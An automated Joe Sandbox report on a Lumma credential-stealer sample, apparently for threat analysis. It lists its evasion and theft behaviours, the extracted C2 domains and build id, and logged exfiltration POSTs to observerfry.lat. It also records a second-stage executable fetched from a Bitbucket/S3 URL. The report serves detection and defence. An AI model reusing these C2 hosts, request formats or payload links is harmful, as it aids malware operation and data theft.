Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Yh6fS6qfTE.exe

Overview

General Information

Sample name:Yh6fS6qfTE.exe
renamed because original name is a hash value
Original sample name:6cb8e80fe23740dff137816a6572a5ba.exe
Analysis ID:1579720
MD5:6cb8e80fe23740dff137816a6572a5ba
SHA1:446866ccfa51b2e7f8d37d6d703ed660ba408df0
SHA256:74d4a3a971e9d7cb7e2a9f3b3c01e7936075aa5c975ee83e54881f53ecff3379
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Yh6fS6qfTE.exe (PID: 7200 cmdline: "C:\Users\user\Desktop\Yh6fS6qfTE.exe" MD5: 6CB8E80FE23740DFF137816A6572A5BA)
    • WerFault.exe (PID: 7704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 1928 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["curverpluch.lat", "shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "talkynicer.lat", "tentabatte.lat", "manyrestro.lat", "bashfulacid.lat"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Yh6fS6qfTE.exe PID: 7200JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Yh6fS6qfTE.exe PID: 7200JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Yh6fS6qfTE.exe PID: 7200JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Yh6fS6qfTE.exe PID: 7200JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:04:10.172670+010020283713Unknown Traffic192.168.2.1049701104.21.36.201443TCP
                2024-12-23T08:04:12.163814+010020283713Unknown Traffic192.168.2.1049703104.21.36.201443TCP
                2024-12-23T08:04:14.529127+010020283713Unknown Traffic192.168.2.1049709104.21.36.201443TCP
                2024-12-23T08:04:17.228213+010020283713Unknown Traffic192.168.2.1049715104.21.36.201443TCP
                2024-12-23T08:04:19.631552+010020283713Unknown Traffic192.168.2.1049721104.21.36.201443TCP
                2024-12-23T08:04:22.674668+010020283713Unknown Traffic192.168.2.1049732104.21.36.201443TCP
                2024-12-23T08:04:25.482375+010020283713Unknown Traffic192.168.2.1049740104.21.36.201443TCP
                2024-12-23T08:04:30.676889+010020283713Unknown Traffic192.168.2.1049752104.21.36.201443TCP
                2024-12-23T08:04:32.985383+010020283713Unknown Traffic192.168.2.1049758185.166.143.50443TCP
                2024-12-23T08:04:35.384918+010020283713Unknown Traffic192.168.2.104976452.217.18.140443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:04:10.937958+010020546531A Network Trojan was detected192.168.2.1049701104.21.36.201443TCP
                2024-12-23T08:04:12.934573+010020546531A Network Trojan was detected192.168.2.1049703104.21.36.201443TCP
                2024-12-23T08:04:31.455213+010020546531A Network Trojan was detected192.168.2.1049752104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:04:10.937958+010020498361A Network Trojan was detected192.168.2.1049701104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:04:12.934573+010020498121A Network Trojan was detected192.168.2.1049703104.21.36.201443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:04:23.467326+010020480941Malware Command and Control Activity Detected192.168.2.1049732104.21.36.201443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Yh6fS6qfTE.exeAvira: detected
                Source: Yh6fS6qfTE.exe.7200.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["curverpluch.lat", "shapestickyr.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "talkynicer.lat", "tentabatte.lat", "manyrestro.lat", "bashfulacid.lat"], "Build id": "LOGS11--LiveTraffic"}
                Source: Yh6fS6qfTE.exeReversingLabs: Detection: 60%
                Source: Yh6fS6qfTE.exeVirustotal: Detection: 56%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Yh6fS6qfTE.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: Yh6fS6qfTE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.10:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.18.140:443 -> 192.168.2.10:49764 version: TLS 1.2
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49701 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49732 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49703 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49752 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49703 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49701 -> 104.21.36.201:443
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49721 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49715 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49703 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49701 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49709 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49740 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49758 -> 185.166.143.50:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49764 -> 52.217.18.140:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49752 -> 104.21.36.201:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49732 -> 104.21.36.201:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0EJN6A3PZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12799Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QP80O4MCUY78ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15050Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AOLLEKSDMMCQNPI9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20430Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NREVLCRGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1211Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7U9NNJRY0XWPO12User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571438Host: observerfry.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: observerfry.lat
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2JcmoM7yMSgbDsoQ0cWoQJiuLny%2BOgtUxL0Kt2wR5hwGCVrIifmHynfYsW0MUKSiDkWMfo%2FjPuC275RdIKqyvbvnR64DRMAhp0z5MhZstWCaV8QT4IUjNY5%2BNgVba3urSkJnOCqY4fkw0LSEnp5g%3D%3D&Expires=1734938485 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNRVK3O6C&Signature=bByUD0dwbg83H%2B08dW7zc8pOm%2Bg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJGMEQCIC%2B3%2BjjbUGy0cjpzRRt6zZkEP8eYcNsEXxJyxzBfB3lyAiBIwHqx1SbPwC93UpRITG%2FtrJmfMbZ%2FMXMhi%2BrpeiLhTSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMr97ZQWydwtjVD%2FpUKoQCHlbL64aNAUs4s7esfnGXOd9hXvgq4lUh%2FQ0cD%2FYV5YaiDhEKUfk%2B7GlLTWJfer66qWqqXLx8kitt6%2FA4KK5y64dXWwliu0m0tn1smPd2eoWfQIpk9bYGZwtZB5Scx2vR942g3DzN%2Fvdodbo3w6cqKqQy2ODgJOCBPHZ9P1ANP6B%2BNTBekl2XQwIqFwe7DJSORVZm7%2BEwOihmeCtNTLNto5dobnF5VOueL3lrsMTg7mCaNjr9mVsieDw%2FsO3a%2Fxh3Dx8zzj57LdQ%2FRCMdgUookY1HthLgxHwTapScSAJbiw0Tz0v3em5jIi5Jfz4z0KsfJ9sVcTEzP9i1MdEYNBll3KE8eNIw7ZCkuwY6ngGd2muSZEx%2BEhQWHxRfS%2FkoWFVkYiveDA%2FCxx59WBWRi1RllYutEaisKs85SZO4fX2JcmoM7yMSgbDsoQ0cWoQJiuLny%2BOgtUxL0Kt2wR5hwGCVrIifmHynfYsW0MUKSiDkWMfo%2FjPuC275RdIKqyvbvnR64DRMAhp0z5MhZstWCaV8QT4IUjNY5%2BNgVba3urSkJnOCqY4fkw0LSEnp5g%3D%3D&Expires=1734938485 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: observerfry.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1475916315.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514509667.000000000142F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTru/p&Jr
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875849808.00000000061F9000.00000002.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605121311.0000000005B5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
